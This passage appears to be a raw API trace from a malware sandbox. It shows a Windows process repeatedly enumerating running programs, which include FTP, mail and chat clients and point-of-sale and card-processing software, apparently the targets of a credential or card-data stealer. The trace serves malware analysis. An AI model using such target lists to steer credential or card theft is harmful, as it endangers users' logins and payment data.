szExeFile="leechftp.exe")) returned 1 [0206.222] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0206.224] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0206.226] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0206.228] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0206.282] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0206.284] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0206.286] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0206.288] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0206.290] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0206.292] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0206.297] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0206.299] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0206.301] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0206.302] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0206.305] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0206.306] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0206.313] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0206.315] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0206.317] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0206.319] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0206.321] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0206.363] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0206.365] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0206.367] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0206.369] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0206.374] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0206.376] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0206.378] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0206.380] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0206.382] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0206.384] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0206.388] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0206.390] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0206.392] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0206.393] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.395] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.397] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.400] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0206.454] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0206.457] CloseHandle (hObject=0x11cc) returned 1 [0206.457] Sleep (dwMilliseconds=0x64) [0206.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0206.690] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.692] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.695] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.697] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.702] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.704] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.707] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.709] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.711] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.713] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.118] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.121] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0207.124] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.129] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.136] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.138] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.143] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.146] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.149] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.301] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0207.304] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0207.307] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0207.312] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.315] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.317] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0207.320] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0207.323] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0207.330] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0207.333] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.336] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0207.436] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0207.441] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.444] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0207.447] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0207.452] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0207.455] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0207.458] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0207.460] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0207.463] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0207.467] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0207.470] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0207.473] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0207.475] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0207.477] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0207.577] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 